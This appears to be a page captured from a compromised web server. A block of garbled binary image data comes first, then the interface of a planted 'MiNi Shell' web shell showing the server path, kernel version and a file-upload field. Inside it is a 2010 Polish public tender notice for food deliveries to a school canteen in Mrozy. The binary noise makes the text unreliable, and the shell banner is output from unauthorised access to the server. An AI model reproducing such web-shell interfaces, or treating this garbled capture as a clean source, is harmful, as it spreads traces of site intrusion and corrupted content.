JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/14424-N-2010.html

<p class="kh_header"><b>Mrozy: Dostawa artykułów Sywnościowych do Zespołu Szkół Publicznych w
Mrozach ul Licealna 3. dla potrzeb stołówki szkolnej z dostawą do zamawiającego na
koszt oferenta.</b><br>
<b>Numer ogłoszenia: 14424 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Publicznych w Mrozach , ul. Licealna 3, 05-320 Mrozy, woj. mazowieckie, tel. 0-25 75 74 194, faks 0-25 7574683.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zespolszkol.mrozy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół w Mrozach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów Sywnościowych do Zespołu Szkół Publicznych w
Mrozach ul Licealna 3. dla potrzeb stołówki szkolnej z dostawą do zamawiającego na
koszt oferenta..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 21 Herbata 80 g szt 60
22 Jabłko kg 700
23 Jajko szt 1500
24 Kurczak kg 60
25 Kości kg 100
26 Kiełbasa kg 250
27 Kisiel 65 g szt 60
28 Kwasek cytrynowy 30 g szt 45
29 Karkówka b/z kości kg 250
30 Koncentrat pomidorowy 190 g szt 260
31 Kapusta czerwona kg 100
32 Kiwi kg 100
33 Kapusta pekińska kg 200
34 Kapusta biała kg 330
35 Kapusta włoska kg 280
36 Kapusta kiszona kg 350
37 Kasza gryczana kg 55
38 Kasza jęczmienna kg 130
39 Liść laurowy 10 g szt 76
40 Łopatka kg 350
41 Mąka ziemniaczana kg 60
42 Makaron 0,5 kg szt 400
43 Mandarynka kg 200
44 Mąka pszenna kg 550
45 Mleko l 60
46 Masło 250 g szt 20
47 Margaryna 250 g szt 130
48 Marchew kg 850
49 Marchew mroSona 0,5 kg szt 70
50 Musztarda 180 g szt 20
51 Majonez 250 g szt 120
52 Mieszanka kompotowa 0,5 kg szt 120
53 Majeranek 10 g szt 150
54 Mięso wieprz. drobne kg 180
55 Ogórek kiszony kg 250
56 Ogórek świeSy kg 250
57 Ogórek konserwowy 1 kg szt 80
58 Olej l 220
59 Pieprz ziołowy 20 g szt 160
60 Pieprz naturalny 20 g szt 200
61 Papryka świeSa kg 25
62 Pieczarka kg 70
63 Pietruszka kg 200
64 Papryka konserwowa 260 g szt 60
65 Przyprawa do mięs 30 g szt 70
66 Pączek szt 300
67 Porcja rosołowa kg 320
68 Por kg 200
69 Pomidor kg 200
70 Przecier ogórkowy 350 g szt 35
71 Pomarańcze kg 60
72 rabarbar kg 10
73 RyS kg 60
74 Ryba kg 200
75 Rodzynki kg 10
76 Rzodkiewka pęcz 30
77 Sałata gł 300
78 Szczaw konserw 350 g szt 85
79 Sól kg 200
80 Sos sałatkowy szt 10
81 Seler kg 150
82 Schab kg 230
83 Smalec 250 g szt 180
84 Ser 250 g kost 840
85 Śmietana 400 g szt 500
86 Śliwka świeSa kg 250
87 Szczypior pecz 25
88 Słonina kg 15
89 Truskawka kg 80
90 Udo drobiowe kg 500
91 ziemniaki kg 16000
92 Ziele angielskie 15 g szt 86
93 Seberka kg 35
94 Sołądek drobiowy kg 30
95 Mięso od szynki kg 160
96 Marchew + gr. mroSonka kg 90
97 Sos łowicz 250g szt 300
98 Nektarynka kg 150
99 Zupa warzywna mroSona 0,50 kg 140
100 Syrop owocowy l 40
101 Fasolka szparagowa 0,50 kg 40
102 podgardle kg 10
103 kalafior szt 30
104 Kapusta młoda szt 150
105 Koper szt 20
106 Natka pietruszki szt 15
107 Kostka rosołowa szt 15
108 chrzan szt 10
109 Przyprawa do kurczaka szt 10
110 jogurt szt 300
111 Groszek konserwowy szt 15
112 Serca drobiowe kg 30.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie
warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności,
jeSeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22
Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa
zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego
postępowania, lub posługiwali się w celu sporządzenia oferty osobami
uczestniczącymi w dokonywaniu tych czynności chyba, Se udział tych wykonawców
w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złoSyli nieprawdziwe informacje mające wpływ na wynik prowadzonego
postępowania.
2.5 nie złoSyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków z zastrzeSeniem art. 26 ust.
3 Prawa zamówień publicznych.
2.6 nie wnieśli wadium, w tym równieS na przedłuSony okres związania ofertą, lub nie
zgodzili się na przedłuSenie okresu związania ofertą.
2.7Inne podstawy wykluczenia wykonawców
3. Zamawiający odrzuca ofertę jeSeli:
3.1 jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych
warunków zamówienia,
3.2 jej złoSenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o
zwalczaniu nieuczciwej konkurencji
3.3 zawiera raSąco niską cenę w stosunku do przedmiotu zamówienia,
3.4 została złoSona przez wykonawcę wykluczonego z udziału w postępowaniu o
udzielenie zamówienia lub nie zaproszonego do składania ofert
3.5 zawiera omyłki rachunkowe w obliczeniu ceny, których nie moSna poprawić na
podstawie art. 88 Prawa zamówień publicznych, lub błędy w obliczeniu ceny
3.6 wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na
poprawienie omyłki rachunkowej w obliczeniu ceny
3.7 jest niewaSna na podstawie odrębnych przepisów,
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w
oparciu o dokumenty złoSone przez wykonawcę w niniejszym postępowaniu metodą
warunku granicznego - spełnia/niespełna..</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zespolszkol.mrozy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Publicznych Mrozy
Licealna  3
05-320  Mrozy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 11:00, miejsce: Zespół Szkół Publicznych Mrozy
Licealna  3
05-320  Mrozy
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 30.06.2010.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com